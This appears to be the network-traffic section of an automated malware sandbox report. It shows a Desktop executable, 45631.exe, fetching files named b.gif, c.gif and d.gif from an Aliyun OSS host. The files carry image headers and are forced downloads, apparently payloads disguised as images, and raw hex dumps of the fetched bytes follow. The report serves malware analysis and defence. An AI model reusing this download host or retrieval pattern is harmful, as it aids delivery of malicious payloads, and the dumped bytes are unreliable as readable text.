                                                  2025-01-02 11:14:07 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                                  Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                                  2025-01-02 11:14:07 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                                  Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.64997439.103.20.594431656C:\Users\user\Desktop\45631.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:14:08 UTC111OUTGET /b.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:14:09 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:14:08 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 125333
                                                  Connection: close
                                                  x-oss-request-id: 6776750035EB263636FD2260
                                                  Accept-Ranges: bytes
                                                  ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                                  Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 10333201072197591521
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                                  x-oss-server-time: 1
                                                  2025-01-02 11:14:09 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                                  Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                                  Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                                  Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                                  2025-01-02 11:14:09 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                                  Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                                  Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                                  Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                                  Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                                  Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                                  2025-01-02 11:14:09 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                                  Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.64998339.103.20.594431656C:\Users\user\Desktop\45631.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:14:11 UTC111OUTGET /c.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:14:11 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:14:11 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 10681
                                                  Connection: close
                                                  x-oss-request-id: 67767503998B3E35303A286F
                                                  Accept-Ranges: bytes
                                                  ETag: "10A818386411EE834D99AE6B7B68BE71"
                                                  Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 10287299869673359293
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                                  x-oss-server-time: 18
                                                  2025-01-02 11:14:11 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-02 11:14:11 UTC4096INData Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66
                                                  Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
                                                  2025-01-02 11:14:11 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                                  Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.64998439.103.20.594431656C:\Users\user\Desktop\45631.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:14:12 UTC111OUTGET /d.gif HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: ry2ihs.oss-cn-beijing.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:14:13 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:14:13 GMT
                                                  Content-Type: image/gif
                                                  Content-Length: 3892010
                                                  Connection: close
                                                  x-oss-request-id: 67767505820F3F30373DA531
                                                  Accept-Ranges: bytes
                                                  ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                                  Last-Modified: Thu, 02 Jan 2025 10:14:17 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 3363616613234190325
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000104
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                                  x-oss-server-time: 4
                                                  2025-01-02 11:14:13 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                  2025-01-02 11:14:13 UTC4096INData Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f
                                                  Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|o
